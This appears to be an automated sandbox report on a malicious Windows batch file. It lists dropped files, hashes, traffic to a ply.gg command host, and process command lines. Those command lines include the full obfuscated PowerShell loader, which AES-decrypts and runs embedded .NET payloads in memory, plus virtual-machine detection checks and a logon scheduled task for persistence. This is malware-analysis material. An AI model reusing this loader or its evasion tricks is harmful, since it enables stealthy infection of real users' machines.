SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnrngxsf.4jk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xta1tbik.5hd.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\$nya-Logs\2024-09-26

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	352
Entropy (8bit):	7.416107800458223
Encrypted:	false
SSDEEP:	6:68xozOFc9+pP6IRdYn4jNWGObVeVHaMv558vc/G0BUV/e8UVORVIwFzvBGih:hxo6e9+h6IrY4ZWrRelaML3UoRVGVHzT
MD5:	CE78A2266E4AC5659C996AA019D615D4
SHA1:	D7AE13C52B60A0602AB229F7889A779CBC35DE9A
SHA-256:	5F74F14D0DAC60B604F7FFAA2A134C21DF900C8247F1FC125FA654521399CCC4
SHA-512:	BC12389DA603D05C015E5F4B0B1D6AB3A2E11D7AFFF6CF9E3DF94CFAFD8F16E19EB4F5BCC8A589C98EC47120ECC9734059AF766ACDB7BEFC0451E28DE1DD89EC
Malicious:	false
Preview:	..APp..WG...o&..M\W...N.c:W...&&e'p./m.[.3..b...&H....-Zmk4X.Q..q..-S..z].....w...@..+...2...e.]......S..KJl.....5..#-..d^...j.........2.u...-Mg.K<...zJ.........T!..t.C..._....."...T40.....Nf.*x.7..z5TA.Qd..."..W}b..N9:......9..Xqpqa.hF.../.......l....h....p.<IY.I...u.Z\|W.a.p.w.E...H]+..ro..t......Z9.."..c...2..8.aE.&......Y..D

C:\Windows\$cnt-onimai2\$cnt-CO2.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with very long lines (5483), with CRLF line terminators
Category:	dropped
Size (bytes):	5235007
Entropy (8bit):	6.036856711369073
Encrypted:	false
SSDEEP:	49152:gjajLYkJeb89At9lRsiPuDb5okqs0XcoJzLQKSWrlN3krQTGq3oRn8UV:J
MD5:	5C6DBF4219FD4E2251DE392EB2544581
SHA1:	8F79AC10FD2BF6F5324FF9C19F278E3F9D5B4FA3
SHA-256:	FD4270F11AFEE189662BB9BD907F3D732002A44A76AB3C356B50E0E64A4E81B4
SHA-512:	3796219BD8F7D344AFD8684FD25A71942A37BC5511D27D50CF42AAE27C42B73C8A91A301CCAE2B52C3706ADAC27AC4529C1F6ACB38C86D0750E108374A6FDE43
Malicious:	true
Preview:	@echo off..%^%@%nVnlHKQvNhtczvEAdRFIlZKoSMVLvDbELLTGXIsJPhMAVSkkpeGazdenlZsUPfZkfPrNBYDuyVSdnksaCKvqXaeIHGvXqyTKiBugBwJrBlCDkbaaGsrfJJnfKJgVDFeachVLPmygbePLyBxFGurYgObz%%^%e%pwRpNNVhBBcfokuTldFTBGilApiofTngwxAQGQnqTDWavArjWeVKwFNJnGOyFHbHnWJRKEmuQoZXJiQaXYraXCKQKQCacPKlCoMzQAzsSBUhFPZfQNBHqaKKlShTbmraDNvuvrkwzYiwICkURxkood%%^%c%BEbnXtFqGjTDRtFJyDeirSncIHmcEbdMASUPudmcTICmOZtBmOLKjVDJqYEphDMEghdZzPovrcoJpboJoLQQqsCEplyvzWUqVXfHVubwzqthGTtpKVbwMWnOEyJoqTVvhYOrVGOUJtqaYvYvRjKDUyDZKrcwKNfFuYZIfbteggMtFnPiAowhjsAJuOHEErkWnLFawpqQPGxOLk%%^%h%wCUVwqYwcyqoqtOzOWQfUIOMlYGrDULXjulcKwOFppDCfbZwagIRVfzONiKyJGThMteWiMPsikQEelGjZkqwmTbeUxoBMpVIwvQMXcooqpJLpVJBBAzzqwUSrZbKynGSohiIvTmWWcgXkqPZOMamQwrZBYvXaDQ%%^%o%JRwhMagInCDoqXIakcWLnubSPihxxoVsmdnsTImNGrYnSdJDpvNYHeOpPErETJlYHlbmKpgBPjfWvNZLyDhcBWLhoYDoqIUWfaGHbxTaoljxYSUbFFfpBjxKzUXMLSkgo%%^% %QvhsKbKgNpNniweBJLDEuWCVhhzhpwbciQbyUmVdEvvhXmLBIjizCKNTSllCCDRroKesvFHwQAZZBuYVwYzfnCzychFIbtBbDdTmhsgcCLJcKOsxmpfEdMdLkFqnZYuwYYvxBLNeSwDB%%^%o%xOnPiwLnXXRZ

C:\Windows\$cnt-onimai2\$cnt-CO2.bat:Zone.Identifier

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\System32\Tasks\$cnt-sYvLLQ2I

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	3488
Entropy (8bit):	3.585260056017724
Encrypted:	false
SSDEEP:	48:yei1q97eUQn1ab9o9V9Lvara+i3iusupRCRvA9ufAuRa7G5XhPsbN1jANg8iJXCf:tenkp2Gdi3ipVA9ll7EhAMz3cHtj+
MD5:	435BC377C9DA15F255683ADB20DBEA2F
SHA1:	1C4B276328484F5D0653BD608B5CC9B07613DD99
SHA-256:	0D9489B9E8BB6FF182FBFE3A617E77261DBB914F19FEBFD34F522A3C90D4B33C
SHA-512:	A9E78D0F2A6F077C58FFF5F5E967F5D0604D8C4F786E7990842BFA9A94390A347372C79BAFBED067587DF853C3D2E05CBB3510C22F33BD5303903D28AFE2E352
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...2.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.D.a.t.e.>.2.0.2.4.-.0.9.-.2.6.T.0.7.:.4.0.:.4.0...8.9.6.-.0.4.:.0.0.<./.D.a.t.e.>..... . . . .<.U.R.I.>.\.$.c.n.t.-.s.Y.v.L.L.Q.2.I.<./.U.R.I.>..... . .<./.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . .<.T.r.i.g.g.e.r.s.>..... . . . .<.L.o.g.o.n.T.r.i.g.g.e.r.>..... . . . . . .<.E.n.a.b.l.e.d.>.t.r.u.e.<./.E.n.a.b.l.e.d.>..... . . . .<./.L.o.g.o.n.T.r.i.g.g.e.r.>..... . .<./.T.r.i.g.g.e.r.s.>..... . .<.P.r.i.n.c.i.p.a.l.s.>..... . . . .<.P.r.i.n.c.i.p.a.l. .i.d.=.".A.u.t.h.o.r.".>..... . . . . . .<.R.u.n.L.e.v.e.l.>.H.i.g.h.e.s.t.A.v.a.i.l.a.b.l.e.<./.R.u.n.L.e.v.e.l.>..... . . . . . .<.G.r.o.u.p.I.d.>.b.u.i.l.t.i.n.\.U.s.e.r.s.<./.G.r.o.u.p.I.d.>..... . . . .<./.P.r.i.n.c.i.p.a.l.>..... .

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Windows\Temp\__PSScriptPolicyTest_czh1ayd4.gmu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_ehhlhx4m.orb.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

\Device\ConDrv

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.760508842979807
Encrypted:	false
SSDEEP:	3:jKMFIwpVhHzeL+z4fyM9oM3Ky:jKMFIsVE1R3Ky
MD5:	3C9809BF686E91BA1423D06856199D4D
SHA1:	0A554D88070D73087295C39F216A50DD65EA49EB
SHA-256:	86F92161F9B6C2BFCF3720A3938EF4FC5891D23D7FA85DA4207E21A6F5984137
SHA-512:	E810ECA2492A3A9C36C9C426D073DC9AA1B3F5BE39ADF51E576ADD2A876D33C08C10514C713B581093E00268CDEDD8308AC3A0CA3F7A2034E36B538339328C38
Malicious:	false
Preview:	Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden ..

\Device\Null

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.252709127263888
Encrypted:	false
SSDEEP:	3:ODBA3/+KjMFAdmgLdI5L/y8pAvaKFMmIFcuyn:UA1jMF4HK5LDuvaKxNn
MD5:	5069E03C2A38705FE08B48569929996B
SHA1:	049F65D11E6DBE3267BBE4C0D2228C5CD643AEA8
SHA-256:	208A7A282AFFBA4446ADEA963D1740C4D3A4D997718396D38E9FE8C912DB63BD
SHA-512:	678A629E61A41EEF3144DB65F14B924A8A7049F76D0DF4DE56D39F30B014E65376BD9FD85CAB3F475CB521396830CB813EAAB38B3AEC6A27E4269A8FD57C738C
Malicious:	false
Preview:	'u' is not recognized as an internal or external command,..operable program or batch file...

Static File Info

General

File type:	DOS batch file, ASCII text, with very long lines (5483), with CRLF line terminators
Entropy (8bit):	6.036856711369073
TrID:	BibTeX references (5501/1) 100.00%
File name:	Q5N7WOpk8J.bat
File size:	5'235'007 bytes
MD5:	5c6dbf4219fd4e2251de392eb2544581
SHA1:	8f79ac10fd2bf6f5324ff9c19f278e3f9d5b4fa3
SHA256:	fd4270f11afee189662bb9bd907f3d732002a44a76ab3c356b50e0e64a4e81b4
SHA512:	3796219bd8f7d344afd8684fd25a71942a37bc5511d27d50cf42aae27c42b73c8a91a301ccae2b52c3706adac27ac4529c1f6acb38c86d0750e108374a6fde43
SSDEEP:	49152:gjajLYkJeb89At9lRsiPuDb5okqs0XcoJzLQKSWrlN3krQTGq3oRn8UV:J
TLSH:	62360205EA64BDCCFD27602673C78D04EF7A5B945FA0A23272ADE1C23B497359426D0E
File Content Preview:	@echo off..%^%@%nVnlHKQvNhtczvEAdRFIlZKoSMVLvDbELLTGXIsJPhMAVSkkpeGazdenlZsUPfZkfPrNBYDuyVSdnksaCKvqXaeIHGvXqyTKiBugBwJrBlCDkbaaGsrfJJnfKJgVDFeachVLPmygbePLyBxFGurYgObz%%^%e%pwRpNNVhBBcfokuTldFTBGilApiofTngwxAQGQnqTDWavArjWeVKwFNJnGOyFHbHnWJRKEmuQoZXJiQaX

File Icon


Icon Hash:	9686878b929a9886

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 12:20:53.420803070 CEST	49704	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:20:53.425973892 CEST	43063	49704	147.185.221.21	192.168.2.7
Sep 26, 2024 12:20:53.426109076 CEST	49704	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:20:53.471999884 CEST	49704	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:20:53.477803946 CEST	43063	49704	147.185.221.21	192.168.2.7
Sep 26, 2024 12:21:14.827409029 CEST	43063	49704	147.185.221.21	192.168.2.7
Sep 26, 2024 12:21:14.827516079 CEST	49704	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:21:14.833597898 CEST	49704	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:21:14.838449001 CEST	43063	49704	147.185.221.21	192.168.2.7
Sep 26, 2024 12:21:18.488673925 CEST	49706	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:21:18.493684053 CEST	43063	49706	147.185.221.21	192.168.2.7
Sep 26, 2024 12:21:18.493769884 CEST	49706	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:21:18.494064093 CEST	49706	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:21:18.498863935 CEST	43063	49706	147.185.221.21	192.168.2.7
Sep 26, 2024 12:21:40.164839029 CEST	43063	49706	147.185.221.21	192.168.2.7
Sep 26, 2024 12:21:40.164886951 CEST	43063	49706	147.185.221.21	192.168.2.7
Sep 26, 2024 12:21:40.164928913 CEST	49706	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:21:40.164973021 CEST	49706	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:21:40.165426970 CEST	49706	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:21:40.170164108 CEST	43063	49706	147.185.221.21	192.168.2.7
Sep 26, 2024 12:21:43.566688061 CEST	49707	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:21:43.571773052 CEST	43063	49707	147.185.221.21	192.168.2.7
Sep 26, 2024 12:21:43.572072029 CEST	49707	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:21:43.572343111 CEST	49707	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:21:43.577169895 CEST	43063	49707	147.185.221.21	192.168.2.7
Sep 26, 2024 12:22:04.936001062 CEST	43063	49707	147.185.221.21	192.168.2.7
Sep 26, 2024 12:22:04.936070919 CEST	49707	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:22:04.936530113 CEST	49707	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:22:04.941431046 CEST	43063	49707	147.185.221.21	192.168.2.7
Sep 26, 2024 12:22:08.394843102 CEST	49708	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:22:08.624082088 CEST	43063	49708	147.185.221.21	192.168.2.7
Sep 26, 2024 12:22:08.624228001 CEST	49708	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:22:08.624555111 CEST	49708	43063	192.168.2.7	147.185.221.21
Sep 26, 2024 12:22:08.629326105 CEST	43063	49708	147.185.221.21	192.168.2.7
Sep 26, 2024 12:22:30.000740051 CEST	43063	49708	147.185.221.21	192.168.2.7
Sep 26, 2024 12:22:30.000808001 CEST	49708	43063	192.168.2.7	147.185.221.21

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 12:20:53.381516933 CEST	62417	53	192.168.2.7	1.1.1.1
Sep 26, 2024 12:20:53.394795895 CEST	53	62417	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 12:20:53.381516933 CEST	192.168.2.7	1.1.1.1	0x1e6f	Standard query (0)	fixed-noon.gl.at.ply.gg	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 12:20:53.394795895 CEST	1.1.1.1	192.168.2.7	0x1e6f	No error (0)	fixed-noon.gl.at.ply.gg		147.185.221.21	A (IP address)	IN (0x0001)	false

Target ID:	1
Start time:	06:20:08
Start date:	26/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Q5N7WOpk8J.bat" "
Imagebase:	0x7ff734a20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:20:08
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:20:08
Start date:	26/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Model
Imagebase:	0x7ff7fedd0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:20:08
Start date:	26/09/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A"
Imagebase:	0x7ff666420000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:20:09
Start date:	26/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Manufacturer,Model
Imagebase:	0x7ff7fedd0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:20:09
Start date:	26/09/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Imagebase:	0x7ff666420000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:20:11
Start date:	26/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd.exe /c echo function nTIwb($oVJGU){ $dmvwb=[System.Security.Cryptography.Aes]::Create(); $dmvwb.Mode=[System.Security.Cryptography.CipherMode]::CBC; $dmvwb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $dmvwb.Key=[System.Convert]::FromBase64String('q/epIFuUiTeZPvuXMOrJUZKEDTokijbasPqPVgeuzIY='); $dmvwb.IV=[System.Convert]::FromBase64String('2eFTLv8XY+wg1Xp7cznzrQ=='); $bbzAD=$dmvwb.CreateDecryptor(); $hLXQZ=$bbzAD.TransformFinalBlock($oVJGU, 0, $oVJGU.Length); $bbzAD.Dispose(); $dmvwb.Dispose(); $hLXQZ;}function hCkUZ($oVJGU){ Invoke-Expression '$VRbTd=New-Object oniSoniyonisonitonieonimoni.oniIoniOoni.oniMonieonimonioonironiyStonironieoniamoni(,$oVJGU);'.Replace('oni', ''); Invoke-Expression '$GbZBJ=New-Object oniSoniyonisonitonieonim.oniIoniOoni.MonieonimonioonironiyoniSonitonironieoniaonimoni;'.Replace('oni', ''); Invoke-Expression '$qvkjb=New-Object Soniyonisonitonieonimoni.oniIoniOoni.oniConioonimoniponironieonissoniiooninoni.GoniZioniponiSonitonironieoniaonimoni($VRbTd, [oniIoniOoni.oniConioonimoniponironieonisonisoniioniooninoni.oniConioonimoniponironieonisonisoniioniooninoniMonioonidonieoni]::Donieconiomoniproniesonis);'.Replace('oni', ''); $qvkjb.CopyTo($GbZBJ); $qvkjb.Dispose(); $VRbTd.Dispose(); $GbZBJ.Dispose(); $GbZBJ.ToArray();}function uFDAH($oVJGU,$FJSeL){ Invoke-Expression '$qHIdZ=oni[oniSoniyonisonitonieonimoni.oniRonieonifonilonieoniconitoniioniooninoni.oniAonisonisonieonimoniboniloniyoni]oni::oniLoniooniaonidoni([byte[]]$oVJGU);'.Replace('oni', ''); Invoke-Expression '$eNoQZ=$qHIdZ.oniEoninonitonironiyoniPoniooniioninonitoni;'.Replace('oni', ''); Invoke-Expression '$eNoQZ.oniIoninonivonioonikonieoni(oni$oninoniuoniloniloni, $FJSeL)oni;'.Replace('oni', '');}$DNWGy = 'C:\Users\user\Desktop\Q5N7WOpk8J.bat';$host.UI.RawUI.WindowTitle = $DNWGy;$YMRTG=[System.IO.File]::ReadAllText($DNWGy).Split([Environment]::NewLine);foreach ($kGLHr in $YMRTG) { if ($kGLHr.StartsWith(':: ')) { $qObbT=$kGLHr.Substring(3); break; }}$UCMwf=[string[]]$qObbT.Split('\');Invoke-Expression '$oOAsD=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[0])));'.Replace('oni', '');Invoke-Expression '$OwBFa=hCkUZ (nTIwb (oni[oniConiooninonivonieonironitoni]oni:oni:oniFonironioonimoniBoniaonisonieoni6oni4oniSonitonironiioninonigoni($UCMwf[1])));'.Replace('oni', '');uFDAH $oOAsD $null;uFDAH $OwBFa (,[string[]] (''));
Imagebase:	0x7ff734a20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:20:11
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:22:22
Start date:	26/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden \| powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff734a20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:22:22
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:22:22
Start date:	26/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$cnt-onimai2\$cnt-CO2.bat' -WindowStyle Hidden "
Imagebase:	0x7ff734a20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	07:22:22
Start date:	26/09/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -WindowStyle Hidden
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: cmd.exePID: 7896, Parent PID: 7808

General

Target ID:	21
Start time:	07:22:23
Start date:	26/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Windows\$cnt-onimai2\$cnt-CO2.bat" "
Imagebase:	0x7ff734a20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	07:22:23
Start date:	26/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	07:22:23
Start date:	26/09/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic diskdrive get Model
Imagebase:	0x7ff7fedd0000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	07:22:23
Start date:	26/09/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /i "DADY HARDDISK QEMU HARDDISK WDS100T2B0A"
Imagebase:	0x7ff666420000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	true
Has administrator privileges:	true
